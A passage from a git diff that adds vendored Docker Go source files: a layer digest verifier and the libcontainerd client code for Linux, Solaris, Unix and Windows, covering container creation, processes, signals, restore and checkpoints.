{ + if err := tx.SetDescriptor(layer.descriptor); err != nil { + return err + } + } + if layer.parent != nil { + if err := tx.SetParent(layer.parent.chainID); err != nil { + return err + } + } + + return nil +} + +func newVerifiedReadCloser(rc io.ReadCloser, dgst digest.Digest) (io.ReadCloser, error) { + verifier, err := digest.NewDigestVerifier(dgst) + if err != nil { + return nil, err + } + return &verifiedReadCloser{ + rc: rc, + dgst: dgst, + verifier: verifier, + }, nil +} + +type verifiedReadCloser struct { + rc io.ReadCloser + dgst digest.Digest + verifier digest.Verifier +} + +func (vrc *verifiedReadCloser) Read(p []byte) (n int, err error) { + n, err = vrc.rc.Read(p) + if n > 0 { + if n, err := vrc.verifier.Write(p[:n]); err != nil { + return n, err + } + } + if err == io.EOF { + if !vrc.verifier.Verified() { + err = fmt.Errorf("could not verify layer data for: %s. This may be because internal files in the layer store were modified. Re-pulling or rebuilding this image may resolve the issue", vrc.dgst) + } + } + return +} +func (vrc *verifiedReadCloser) Close() error { + return vrc.rc.Close() +} diff --git a/vendor/github.com/docker/docker/layer/ro_layer_windows.go b/vendor/github.com/docker/docker/layer/ro_layer_windows.go new file mode 100644 index 0000000000..32bd7182a3 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/ro_layer_windows.go @@ -0,0 +1,9 @@ +package layer + +import "github.com/docker/distribution" + +var _ distribution.Describable = &roLayer{} + +func (rl *roLayer) Descriptor() distribution.Descriptor { + return rl.descriptor +} diff --git a/vendor/github.com/docker/docker/libcontainerd/client.go b/vendor/github.com/docker/docker/libcontainerd/client.go new file mode 100644 index 0000000000..c14c1c5e46 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/client.go @@ -0,0 +1,46 @@ +package libcontainerd + +import ( + "fmt" + "sync" + + "github.com/docker/docker/pkg/locker" +) + +// clientCommon contains the platform 
agnostic fields used in the client structure +type clientCommon struct { + backend Backend + containers map[string]*container + locker *locker.Locker + mapMutex sync.RWMutex // protects read/write operations from containers map +} + +func (clnt *client) lock(containerID string) { + clnt.locker.Lock(containerID) +} + +func (clnt *client) unlock(containerID string) { + clnt.locker.Unlock(containerID) +} + +// must hold a lock for cont.containerID +func (clnt *client) appendContainer(cont *container) { + clnt.mapMutex.Lock() + clnt.containers[cont.containerID] = cont + clnt.mapMutex.Unlock() +} +func (clnt *client) deleteContainer(containerID string) { + clnt.mapMutex.Lock() + delete(clnt.containers, containerID) + clnt.mapMutex.Unlock() +} + +func (clnt *client) getContainer(containerID string) (*container, error) { + clnt.mapMutex.RLock() + container, ok := clnt.containers[containerID] + defer clnt.mapMutex.RUnlock() + if !ok { + return nil, fmt.Errorf("invalid container: %s", containerID) // fixme: typed error + } + return container, nil +} diff --git a/vendor/github.com/docker/docker/libcontainerd/client_linux.go b/vendor/github.com/docker/docker/libcontainerd/client_linux.go new file mode 100644 index 0000000000..190f981865 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/client_linux.go @@ -0,0 +1,605 @@ +package libcontainerd + +import ( + "fmt" + "os" + "strings" + "sync" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + containerd "github.com/docker/containerd/api/grpc/types" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/mount" + "github.com/golang/protobuf/ptypes" + "github.com/golang/protobuf/ptypes/timestamp" + specs "github.com/opencontainers/runtime-spec/specs-go" + "golang.org/x/net/context" +) + +type client struct { + clientCommon + + // Platform specific properties below here. 
+ remote *remote + q queue + exitNotifiers map[string]*exitNotifier + liveRestore bool +} + +// GetServerVersion returns the connected server version information +func (clnt *client) GetServerVersion(ctx context.Context) (*ServerVersion, error) { + resp, err := clnt.remote.apiClient.GetServerVersion(ctx, &containerd.GetServerVersionRequest{}) + if err != nil { + return nil, err + } + + sv := &ServerVersion{ + GetServerVersionResponse: *resp, + } + + return sv, nil +} + +// AddProcess is the handler for adding a process to an already running +// container. It's called through docker exec. It returns the system pid of the +// exec'd process. +func (clnt *client) AddProcess(ctx context.Context, containerID, processFriendlyName string, specp Process, attachStdio StdioCallback) (pid int, err error) { + clnt.lock(containerID) + defer clnt.unlock(containerID) + container, err := clnt.getContainer(containerID) + if err != nil { + return -1, err + } + + spec, err := container.spec() + if err != nil { + return -1, err + } + sp := spec.Process + sp.Args = specp.Args + sp.Terminal = specp.Terminal + if len(specp.Env) > 0 { + sp.Env = specp.Env + } + if specp.Cwd != nil { + sp.Cwd = *specp.Cwd + } + if specp.User != nil { + sp.User = specs.User{ + UID: specp.User.UID, + GID: specp.User.GID, + AdditionalGids: specp.User.AdditionalGids, + } + } + if specp.Capabilities != nil { + sp.Capabilities = specp.Capabilities + } + + p := container.newProcess(processFriendlyName) + + r := &containerd.AddProcessRequest{ + Args: sp.Args, + Cwd: sp.Cwd, + Terminal: sp.Terminal, + Id: containerID, + Env: sp.Env, + User: &containerd.User{ + Uid: sp.User.UID, + Gid: sp.User.GID, + AdditionalGids: sp.User.AdditionalGids, + }, + Pid: processFriendlyName, + Stdin: p.fifo(syscall.Stdin), + Stdout: p.fifo(syscall.Stdout), + Stderr: p.fifo(syscall.Stderr), + Capabilities: sp.Capabilities, + ApparmorProfile: sp.ApparmorProfile, + SelinuxLabel: sp.SelinuxLabel, + NoNewPrivileges: sp.NoNewPrivileges, + 
Rlimits: convertRlimits(sp.Rlimits), + } + + fifoCtx, cancel := context.WithCancel(context.Background()) + defer func() { + if err != nil { + cancel() + } + }() + + iopipe, err := p.openFifos(fifoCtx, sp.Terminal) + if err != nil { + return -1, err + } + + resp, err := clnt.remote.apiClient.AddProcess(ctx, r) + if err != nil { + p.closeFifos(iopipe) + return -1, err + } + + var stdinOnce sync.Once + stdin := iopipe.Stdin + iopipe.Stdin = ioutils.NewWriteCloserWrapper(stdin, func() error { + var err error + stdinOnce.Do(func() { // on error from attach we don't know if stdin was already closed + err = stdin.Close() + if err2 := p.sendCloseStdin(); err == nil { + err = err2 + } + }) + return err + }) + + container.processes[processFriendlyName] = p + + if err := attachStdio(*iopipe); err != nil { + p.closeFifos(iopipe) + return -1, err + } + + return int(resp.SystemPid), nil +} + +func (clnt *client) SignalProcess(containerID string, pid string, sig int) error { + clnt.lock(containerID) + defer clnt.unlock(containerID) + _, err := clnt.remote.apiClient.Signal(context.Background(), &containerd.SignalRequest{ + Id: containerID, + Pid: pid, + Signal: uint32(sig), + }) + return err +} + +func (clnt *client) Resize(containerID, processFriendlyName string, width, height int) error { + clnt.lock(containerID) + defer clnt.unlock(containerID) + if _, err := clnt.getContainer(containerID); err != nil { + return err + } + _, err := clnt.remote.apiClient.UpdateProcess(context.Background(), &containerd.UpdateProcessRequest{ + Id: containerID, + Pid: processFriendlyName, + Width: uint32(width), + Height: uint32(height), + }) + return err +} + +func (clnt *client) Pause(containerID string) error { + return clnt.setState(containerID, StatePause) +} + +func (clnt *client) setState(containerID, state string) error { + clnt.lock(containerID) + container, err := clnt.getContainer(containerID) + if err != nil { + clnt.unlock(containerID) + return err + } + if container.systemPid == 0 { + 
clnt.unlock(containerID) + return fmt.Errorf("No active process for container %s", containerID) + } + st := "running" + if state == StatePause { + st = "paused" + } + chstate := make(chan struct{}) + _, err = clnt.remote.apiClient.UpdateContainer(context.Background(), &containerd.UpdateContainerRequest{ + Id: containerID, + Pid: InitFriendlyName, + Status: st, + }) + if err != nil { + clnt.unlock(containerID) + return err + } + container.pauseMonitor.append(state, chstate) + clnt.unlock(containerID) + <-chstate + return nil +} + +func (clnt *client) Resume(containerID string) error { + return clnt.setState(containerID, StateResume) +} + +func (clnt *client) Stats(containerID string) (*Stats, error) { + resp, err := clnt.remote.apiClient.Stats(context.Background(), &containerd.StatsRequest{containerID}) + if err != nil { + return nil, err + } + return (*Stats)(resp), nil +} + +// Take care of the old 1.11.0 behavior in case the version upgrade +// happened without a clean daemon shutdown +func (clnt *client) cleanupOldRootfs(containerID string) { + // Unmount and delete the bundle folder + if mts, err := mount.GetMounts(); err == nil { + for _, mts := range mts { + if strings.HasSuffix(mts.Mountpoint, containerID+"/rootfs") { + if err := syscall.Unmount(mts.Mountpoint, syscall.MNT_DETACH); err == nil { + os.RemoveAll(strings.TrimSuffix(mts.Mountpoint, "/rootfs")) + } + break + } + } + } +} + +func (clnt *client) setExited(containerID string, exitCode uint32) error { + clnt.lock(containerID) + defer clnt.unlock(containerID) + + err := clnt.backend.StateChanged(containerID, StateInfo{ + CommonStateInfo: CommonStateInfo{ + State: StateExit, + ExitCode: exitCode, + }}) + + clnt.cleanupOldRootfs(containerID) + + return err +} + +func (clnt *client) GetPidsForContainer(containerID string) ([]int, error) { + cont, err := clnt.getContainerdContainer(containerID) + if err != nil { + return nil, err + } + pids := make([]int, len(cont.Pids)) + for i, p := range cont.Pids { + 
pids[i] = int(p) + } + return pids, nil +} + +// Summary returns a summary of the processes running in a container. +// This is a no-op on Linux. +func (clnt *client) Summary(containerID string) ([]Summary, error) { + return nil, nil +} + +func (clnt *client) getContainerdContainer(containerID string) (*containerd.Container, error) { + resp, err := clnt.remote.apiClient.State(context.Background(), &containerd.StateRequest{Id: containerID}) + if err != nil { + return nil, err + } + for _, cont := range resp.Containers { + if cont.Id == containerID { + return cont, nil + } + } + return nil, fmt.Errorf("invalid state response") +} + +func (clnt *client) UpdateResources(containerID string, resources Resources) error { + clnt.lock(containerID) + defer clnt.unlock(containerID) + container, err := clnt.getContainer(containerID) + if err != nil { + return err + } + if container.systemPid == 0 { + return fmt.Errorf("No active process for container %s", containerID) + } + _, err = clnt.remote.apiClient.UpdateContainer(context.Background(), &containerd.UpdateContainerRequest{ + Id: containerID, + Pid: InitFriendlyName, + Resources: (*containerd.UpdateResource)(&resources), + }) + if err != nil { + return err + } + return nil +} + +func (clnt *client) getExitNotifier(containerID string) *exitNotifier { + clnt.mapMutex.RLock() + defer clnt.mapMutex.RUnlock() + return clnt.exitNotifiers[containerID] +} + +func (clnt *client) getOrCreateExitNotifier(containerID string) *exitNotifier { + clnt.mapMutex.Lock() + w, ok := clnt.exitNotifiers[containerID] + defer clnt.mapMutex.Unlock() + if !ok { + w = &exitNotifier{c: make(chan struct{}), client: clnt} + clnt.exitNotifiers[containerID] = w + } + return w +} + +func (clnt *client) restore(cont *containerd.Container, lastEvent *containerd.Event, attachStdio StdioCallback, options ...CreateOption) (err error) { + clnt.lock(cont.Id) + defer clnt.unlock(cont.Id) + + logrus.Debugf("libcontainerd: restore container %s state %s", cont.Id, 
cont.Status) + + containerID := cont.Id + if _, err := clnt.getContainer(containerID); err == nil { + return fmt.Errorf("container %s is already active", containerID) + } + + defer func() { + if err != nil { + clnt.deleteContainer(cont.Id) + } + }() + + container := clnt.newContainer(cont.BundlePath, options...) + container.systemPid = systemPid(cont) + + var terminal bool + for _, p := range cont.Processes { + if p.Pid == InitFriendlyName { + terminal = p.Terminal + } + } + + fifoCtx, cancel := context.WithCancel(context.Background()) + defer func() { + if err != nil { + cancel() + } + }() + + iopipe, err := container.openFifos(fifoCtx, terminal) + if err != nil { + return err + } + var stdinOnce sync.Once + stdin := iopipe.Stdin + iopipe.Stdin = ioutils.NewWriteCloserWrapper(stdin, func() error { + var err error + stdinOnce.Do(func() { // on error from attach we don't know if stdin was already closed + err = stdin.Close() + }) + return err + }) + + if err := attachStdio(*iopipe); err != nil { + container.closeFifos(iopipe) + return err + } + + clnt.appendContainer(container) + + err = clnt.backend.StateChanged(containerID, StateInfo{ + CommonStateInfo: CommonStateInfo{ + State: StateRestore, + Pid: container.systemPid, + }}) + + if err != nil { + container.closeFifos(iopipe) + return err + } + + if lastEvent != nil { + // This should only be a pause or resume event + if lastEvent.Type == StatePause || lastEvent.Type == StateResume { + return clnt.backend.StateChanged(containerID, StateInfo{ + CommonStateInfo: CommonStateInfo{ + State: lastEvent.Type, + Pid: container.systemPid, + }}) + } + + logrus.Warnf("libcontainerd: unexpected backlog event: %#v", lastEvent) + } + + return nil +} + +func (clnt *client) getContainerLastEventSinceTime(id string, tsp *timestamp.Timestamp) (*containerd.Event, error) { + er := &containerd.EventsRequest{ + Timestamp: tsp, + StoredOnly: true, + Id: id, + } + events, err := clnt.remote.apiClient.Events(context.Background(), er) + if 
err != nil { + logrus.Errorf("libcontainerd: failed to get container events stream for %s: %q", er.Id, err) + return nil, err + } + + var ev *containerd.Event + for { + e, err := events.Recv() + if err != nil { + if err.Error() == "EOF" { + break + } + logrus.Errorf("libcontainerd: failed to get container event for %s: %q", id, err) + return nil, err + } + ev = e + logrus.Debugf("libcontainerd: received past event %#v", ev) + } + + return ev, nil +} + +func (clnt *client) getContainerLastEvent(id string) (*containerd.Event, error) { + ev, err := clnt.getContainerLastEventSinceTime(id, clnt.remote.restoreFromTimestamp) + if err == nil && ev == nil { + // If ev is nil and the container is running in containerd, + // we already consumed all the events of the + // container, including the "exit" one. + // Thus, we request all events containerd has in memory for + // this container in order to get the last one (which should + // be an exit event) + logrus.Warnf("libcontainerd: client is out of sync, restore was called on a fully synced container (%s).", id) + // Request all events since beginning of time + t := time.Unix(0, 0) + tsp, err := ptypes.TimestampProto(t) + if err != nil { + logrus.Errorf("libcontainerd: getLastEventSinceTime() failed to convert timestamp: %q", err) + return nil, err + } + + return clnt.getContainerLastEventSinceTime(id, tsp) + } + + return ev, err +} + +func (clnt *client) Restore(containerID string, attachStdio StdioCallback, options ...CreateOption) error { + // Synchronize with live events + clnt.remote.Lock() + defer clnt.remote.Unlock() + // Check that containerd still knows this container. + // + // In the unlikely event that Restore for this container processes + // its past event before the main loop, the event will be + // processed twice. However, this is not an issue as all those + // events will do is change the state of the container to be + // exactly the same. 
+ cont, err := clnt.getContainerdContainer(containerID) + // Get its last event + ev, eerr := clnt.getContainerLastEvent(containerID) + if err != nil || cont.Status == "Stopped" { + if err != nil { + logrus.Warnf("libcontainerd: failed to retrieve container %s state: %v", containerID, err) + } + if ev != nil && (ev.Pid != InitFriendlyName || ev.Type != StateExit) { + // Wait a while for the exit event + timeout := time.NewTimer(10 * time.Second) + tick := time.NewTicker(100 * time.Millisecond) + stop: + for { + select { + case <-timeout.C: + break stop + case <-tick.C: + ev, eerr = clnt.getContainerLastEvent(containerID) + if eerr != nil { + break stop + } + if ev != nil && ev.Pid == InitFriendlyName && ev.Type == StateExit { + break stop + } + } + } + timeout.Stop() + tick.Stop() + } + + // get the exit status for this container, if we don't have + // one, indicate an error + ec := uint32(255) + if eerr == nil && ev != nil && ev.Pid == InitFriendlyName && ev.Type == StateExit { + ec = ev.Status + } + clnt.setExited(containerID, ec) + + return nil + } + + // container is still alive + if clnt.liveRestore { + if err := clnt.restore(cont, ev, attachStdio, options...); err != nil { + logrus.Errorf("libcontainerd: error restoring %s: %v", containerID, err) + } + return nil + } + + // Kill the container if liveRestore == false + w := clnt.getOrCreateExitNotifier(containerID) + clnt.lock(cont.Id) + container := clnt.newContainer(cont.BundlePath) + container.systemPid = systemPid(cont) + clnt.appendContainer(container) + clnt.unlock(cont.Id) + + container.discardFifos() + + if err := clnt.Signal(containerID, int(syscall.SIGTERM)); err != nil { + logrus.Errorf("libcontainerd: error sending sigterm to %v: %v", containerID, err) + } + // Let the main loop handle the exit event + clnt.remote.Unlock() + select { + case <-time.After(10 * time.Second): + if err := clnt.Signal(containerID, int(syscall.SIGKILL)); err != nil { + logrus.Errorf("libcontainerd: error sending sigkill 
to %v: %v", containerID, err) + } + select { + case <-time.After(2 * time.Second): + case <-w.wait(): + // relock because of the defer + clnt.remote.Lock() + return nil + } + case <-w.wait(): + // relock because of the defer + clnt.remote.Lock() + return nil + } + // relock because of the defer + clnt.remote.Lock() + + clnt.deleteContainer(containerID) + + return clnt.setExited(containerID, uint32(255)) +} + +func (clnt *client) CreateCheckpoint(containerID string, checkpointID string, checkpointDir string, exit bool) error { + clnt.lock(containerID) + defer clnt.unlock(containerID) + if _, err := clnt.getContainer(containerID); err != nil { + return err + } + + _, err := clnt.remote.apiClient.CreateCheckpoint(context.Background(), &containerd.CreateCheckpointRequest{ + Id: containerID, + Checkpoint: &containerd.Checkpoint{ + Name: checkpointID, + Exit: exit, + Tcp: true, + UnixSockets: true, + Shell: false, + EmptyNS: []string{"network"}, + }, + CheckpointDir: checkpointDir, + }) + return err +} + +func (clnt *client) DeleteCheckpoint(containerID string, checkpointID string, checkpointDir string) error { + clnt.lock(containerID) + defer clnt.unlock(containerID) + if _, err := clnt.getContainer(containerID); err != nil { + return err + } + + _, err := clnt.remote.apiClient.DeleteCheckpoint(context.Background(), &containerd.DeleteCheckpointRequest{ + Id: containerID, + Name: checkpointID, + CheckpointDir: checkpointDir, + }) + return err +} + +func (clnt *client) ListCheckpoints(containerID string, checkpointDir string) (*Checkpoints, error) { + clnt.lock(containerID) + defer clnt.unlock(containerID) + if _, err := clnt.getContainer(containerID); err != nil { + return nil, err + } + + resp, err := clnt.remote.apiClient.ListCheckpoint(context.Background(), &containerd.ListCheckpointRequest{ + Id: containerID, + CheckpointDir: checkpointDir, + }) + if err != nil { + return nil, err + } + return (*Checkpoints)(resp), nil +} diff --git 
a/vendor/github.com/docker/docker/libcontainerd/client_solaris.go b/vendor/github.com/docker/docker/libcontainerd/client_solaris.go new file mode 100644 index 0000000000..cb939975f8 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/client_solaris.go @@ -0,0 +1,101 @@ +package libcontainerd + +import "golang.org/x/net/context" + +type client struct { + clientCommon + + // Platform specific properties below here. + remote *remote + q queue + exitNotifiers map[string]*exitNotifier + liveRestore bool +} + +// GetServerVersion returns the connected server version information +func (clnt *client) GetServerVersion(ctx context.Context) (*ServerVersion, error) { + resp, err := clnt.remote.apiClient.GetServerVersion(ctx, &containerd.GetServerVersionRequest{}) + if err != nil { + return nil, err + } + + sv := &ServerVersion{ + GetServerVersionResponse: *resp, + } + + return sv, nil +} + +func (clnt *client) AddProcess(ctx context.Context, containerID, processFriendlyName string, specp Process, attachStdio StdioCallback) (int, error) { + return -1, nil +} + +func (clnt *client) SignalProcess(containerID string, pid string, sig int) error { + return nil +} + +func (clnt *client) Resize(containerID, processFriendlyName string, width, height int) error { + return nil +} + +func (clnt *client) Pause(containerID string) error { + return nil +} + +func (clnt *client) Resume(containerID string) error { + return nil +} + +func (clnt *client) Stats(containerID string) (*Stats, error) { + return nil, nil +} + +func (clnt *client) getExitNotifier(containerID string) *exitNotifier { + clnt.mapMutex.RLock() + defer clnt.mapMutex.RUnlock() + return clnt.exitNotifiers[containerID] +} + +func (clnt *client) getOrCreateExitNotifier(containerID string) *exitNotifier { + clnt.mapMutex.Lock() + defer clnt.mapMutex.Unlock() + w, ok := clnt.exitNotifiers[containerID] + if !ok { + w = &exitNotifier{c: make(chan struct{}), client: clnt} + clnt.exitNotifiers[containerID] = w + } + 
return w +} + +// Restore is the handler for restoring a container +func (clnt *client) Restore(containerID string, attachStdio StdioCallback, options ...CreateOption) error { + return nil +} + +func (clnt *client) GetPidsForContainer(containerID string) ([]int, error) { + return nil, nil +} + +// Summary returns a summary of the processes running in a container. +func (clnt *client) Summary(containerID string) ([]Summary, error) { + return nil, nil +} + +// UpdateResources updates resources for a running container. +func (clnt *client) UpdateResources(containerID string, resources Resources) error { + // Updating resource isn't supported on Solaris + // but we should return nil for enabling updating container + return nil +} + +func (clnt *client) CreateCheckpoint(containerID string, checkpointID string, checkpointDir string, exit bool) error { + return nil +} + +func (clnt *client) DeleteCheckpoint(containerID string, checkpointID string, checkpointDir string) error { + return nil +} + +func (clnt *client) ListCheckpoints(containerID string, checkpointDir string) (*Checkpoints, error) { + return nil, nil +} diff --git a/vendor/github.com/docker/docker/libcontainerd/client_unix.go b/vendor/github.com/docker/docker/libcontainerd/client_unix.go new file mode 100644 index 0000000000..21e8fea666 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/client_unix.go @@ -0,0 +1,142 @@ +// +build linux solaris + +package libcontainerd + +import ( + "encoding/json" + "fmt" + "os" + "path/filepath" + "strings" + "sync" + + "github.com/Sirupsen/logrus" + containerd "github.com/docker/containerd/api/grpc/types" + "github.com/docker/docker/pkg/idtools" + specs "github.com/opencontainers/runtime-spec/specs-go" + "golang.org/x/net/context" +) + +func (clnt *client) prepareBundleDir(uid, gid int) (string, error) { + root, err := filepath.Abs(clnt.remote.stateDir) + if err != nil { + return "", err + } + if uid == 0 && gid == 0 { + return root, nil + } + p := 
string(filepath.Separator) + for _, d := range strings.Split(root, string(filepath.Separator))[1:] { + p = filepath.Join(p, d) + fi, err := os.Stat(p) + if err != nil && !os.IsNotExist(err) { + return "", err + } + if os.IsNotExist(err) || fi.Mode()&1 == 0 { + p = fmt.Sprintf("%s.%d.%d", p, uid, gid) + if err := idtools.MkdirAs(p, 0700, uid, gid); err != nil && !os.IsExist(err) { + return "", err + } + } + } + return p, nil +} + +func (clnt *client) Create(containerID string, checkpoint string, checkpointDir string, spec specs.Spec, attachStdio StdioCallback, options ...CreateOption) (err error) { + clnt.lock(containerID) + defer clnt.unlock(containerID) + + if _, err := clnt.getContainer(containerID); err == nil { + return fmt.Errorf("Container %s is already active", containerID) + } + + uid, gid, err := getRootIDs(specs.Spec(spec)) + if err != nil { + return err + } + dir, err := clnt.prepareBundleDir(uid, gid) + if err != nil { + return err + } + + container := clnt.newContainer(filepath.Join(dir, containerID), options...) 
+ if err := container.clean(); err != nil { + return err + } + + defer func() { + if err != nil { + container.clean() + clnt.deleteContainer(containerID) + } + }() + + if err := idtools.MkdirAllAs(container.dir, 0700, uid, gid); err != nil && !os.IsExist(err) { + return err + } + + f, err := os.Create(filepath.Join(container.dir, configFilename)) + if err != nil { + return err + } + defer f.Close() + if err := json.NewEncoder(f).Encode(spec); err != nil { + return err + } + + return container.start(checkpoint, checkpointDir, attachStdio) +} + +func (clnt *client) Signal(containerID string, sig int) error { + clnt.lock(containerID) + defer clnt.unlock(containerID) + _, err := clnt.remote.apiClient.Signal(context.Background(), &containerd.SignalRequest{ + Id: containerID, + Pid: InitFriendlyName, + Signal: uint32(sig), + }) + return err +} + +func (clnt *client) newContainer(dir string, options ...CreateOption) *container { + container := &container{ + containerCommon: containerCommon{ + process: process{ + dir: dir, + processCommon: processCommon{ + containerID: filepath.Base(dir), + client: clnt, + friendlyName: InitFriendlyName, + }, + }, + processes: make(map[string]*process), + }, + } + for _, option := range options { + if err := option.Apply(container); err != nil { + logrus.Errorf("libcontainerd: newContainer(): %v", err) + } + } + return container +} + +type exitNotifier struct { + id string + client *client + c chan struct{} + once sync.Once +} + +func (en *exitNotifier) close() { + en.once.Do(func() { + close(en.c) + en.client.mapMutex.Lock() + if en == en.client.exitNotifiers[en.id] { + delete(en.client.exitNotifiers, en.id) + } + en.client.mapMutex.Unlock() + }) +} +func (en *exitNotifier) wait() <-chan struct{} { + return en.c +} diff --git a/vendor/github.com/docker/docker/libcontainerd/client_windows.go b/vendor/github.com/docker/docker/libcontainerd/client_windows.go new file mode 100644 index 0000000000..ddcf321c85 --- /dev/null +++ 
b/vendor/github.com/docker/docker/libcontainerd/client_windows.go @@ -0,0 +1,631 @@ +package libcontainerd + +import ( + "errors" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "strings" + "syscall" + + "golang.org/x/net/context" + + "github.com/Microsoft/hcsshim" + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/sysinfo" + "github.com/opencontainers/runtime-spec/specs-go" +) + +type client struct { + clientCommon + + // Platform specific properties below here (none presently on Windows) +} + +// Win32 error codes that are used for various workarounds +// These really should be ALL_CAPS to match golangs syscall library and standard +// Win32 error conventions, but golint insists on CamelCase. +const ( + CoEClassstring = syscall.Errno(0x800401F3) // Invalid class string + ErrorNoNetwork = syscall.Errno(1222) // The network is not present or not started + ErrorBadPathname = syscall.Errno(161) // The specified path is invalid + ErrorInvalidObject = syscall.Errno(0x800710D8) // The object identifier does not represent a valid object +) + +// defaultOwner is a tag passed to HCS to allow it to differentiate between +// container creator management stacks. We hard code "docker" in the case +// of docker. +const defaultOwner = "docker" + +// Create is the entrypoint to create a container from a spec, and if successfully +// created, start it too. Table below shows the fields required for HCS JSON calling parameters, +// where if not populated, is omitted. 
+// +-----------------+--------------------------------------------+---------------------------------------------------+ +// | | Isolation=Process | Isolation=Hyper-V | +// +-----------------+--------------------------------------------+---------------------------------------------------+ +// | VolumePath | \\?\\Volume{GUIDa} | | +// | LayerFolderPath | %root%\windowsfilter\containerID | %root%\windowsfilter\containerID (servicing only) | +// | Layers[] | ID=GUIDb;Path=%root%\windowsfilter\layerID | ID=GUIDb;Path=%root%\windowsfilter\layerID | +// | SandboxPath | | %root%\windowsfilter | +// | HvRuntime | | ImagePath=%root%\BaseLayerID\UtilityVM | +// +-----------------+--------------------------------------------+---------------------------------------------------+ +// +// Isolation=Process example: +// +// { +// "SystemType": "Container", +// "Name": "5e0055c814a6005b8e57ac59f9a522066e0af12b48b3c26a9416e23907698776", +// "Owner": "docker", +// "IsDummy": false, +// "VolumePath": "\\\\\\\\?\\\\Volume{66d1ef4c-7a00-11e6-8948-00155ddbef9d}", +// "IgnoreFlushesDuringBoot": true, +// "LayerFolderPath": "C:\\\\control\\\\windowsfilter\\\\5e0055c814a6005b8e57ac59f9a522066e0af12b48b3c26a9416e23907698776", +// "Layers": [{ +// "ID": "18955d65-d45a-557b-bf1c-49d6dfefc526", +// "Path": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c" +// }], +// "HostName": "5e0055c814a6", +// "MappedDirectories": [], +// "HvPartition": false, +// "EndpointList": ["eef2649d-bb17-4d53-9937-295a8efe6f2c"], +// "Servicing": false +//} +// +// Isolation=Hyper-V example: +// +//{ +// "SystemType": "Container", +// "Name": "475c2c58933b72687a88a441e7e0ca4bd72d76413c5f9d5031fee83b98f6045d", +// "Owner": "docker", +// "IsDummy": false, +// "IgnoreFlushesDuringBoot": true, +// "Layers": [{ +// "ID": "18955d65-d45a-557b-bf1c-49d6dfefc526", +// "Path": 
"C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c" +// }], +// "HostName": "475c2c58933b", +// "MappedDirectories": [], +// "SandboxPath": "C:\\\\control\\\\windowsfilter", +// "HvPartition": true, +// "EndpointList": ["e1bb1e61-d56f-405e-b75d-fd520cefa0cb"], +// "HvRuntime": { +// "ImagePath": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c\\\\UtilityVM" +// }, +// "Servicing": false +//} +func (clnt *client) Create(containerID string, checkpoint string, checkpointDir string, spec specs.Spec, attachStdio StdioCallback, options ...CreateOption) error { + clnt.lock(containerID) + defer clnt.unlock(containerID) + logrus.Debugln("libcontainerd: client.Create() with spec", spec) + + configuration := &hcsshim.ContainerConfig{ + SystemType: "Container", + Name: containerID, + Owner: defaultOwner, + IgnoreFlushesDuringBoot: false, + HostName: spec.Hostname, + HvPartition: false, + } + + if spec.Windows.Resources != nil { + if spec.Windows.Resources.CPU != nil { + if spec.Windows.Resources.CPU.Count != nil { + // This check is being done here rather than in adaptContainerSettings + // because we don't want to update the HostConfig in case this container + // is moved to a host with more CPUs than this one. 
+ cpuCount := *spec.Windows.Resources.CPU.Count + hostCPUCount := uint64(sysinfo.NumCPU()) + if cpuCount > hostCPUCount { + logrus.Warnf("Changing requested CPUCount of %d to current number of processors, %d", cpuCount, hostCPUCount) + cpuCount = hostCPUCount + } + configuration.ProcessorCount = uint32(cpuCount) + } + if spec.Windows.Resources.CPU.Shares != nil { + configuration.ProcessorWeight = uint64(*spec.Windows.Resources.CPU.Shares) + } + if spec.Windows.Resources.CPU.Percent != nil { + configuration.ProcessorMaximum = int64(*spec.Windows.Resources.CPU.Percent) * 100 // ProcessorMaximum is a value between 1 and 10000 + } + } + if spec.Windows.Resources.Memory != nil { + if spec.Windows.Resources.Memory.Limit != nil { + configuration.MemoryMaximumInMB = int64(*spec.Windows.Resources.Memory.Limit) / 1024 / 1024 + } + } + if spec.Windows.Resources.Storage != nil { + if spec.Windows.Resources.Storage.Bps != nil { + configuration.StorageBandwidthMaximum = *spec.Windows.Resources.Storage.Bps + } + if spec.Windows.Resources.Storage.Iops != nil { + configuration.StorageIOPSMaximum = *spec.Windows.Resources.Storage.Iops + } + } + } + + var layerOpt *LayerOption + for _, option := range options { + if s, ok := option.(*ServicingOption); ok { + configuration.Servicing = s.IsServicing + continue + } + if f, ok := option.(*FlushOption); ok { + configuration.IgnoreFlushesDuringBoot = f.IgnoreFlushesDuringBoot + continue + } + if h, ok := option.(*HyperVIsolationOption); ok { + configuration.HvPartition = h.IsHyperV + configuration.SandboxPath = h.SandboxPath + continue + } + if l, ok := option.(*LayerOption); ok { + layerOpt = l + } + if n, ok := option.(*NetworkEndpointsOption); ok { + configuration.EndpointList = n.Endpoints + configuration.AllowUnqualifiedDNSQuery = n.AllowUnqualifiedDNSQuery + continue + } + if c, ok := option.(*CredentialsOption); ok { + configuration.Credentials = c.Credentials + continue + } + } + + // We must have a layer option with at least one 
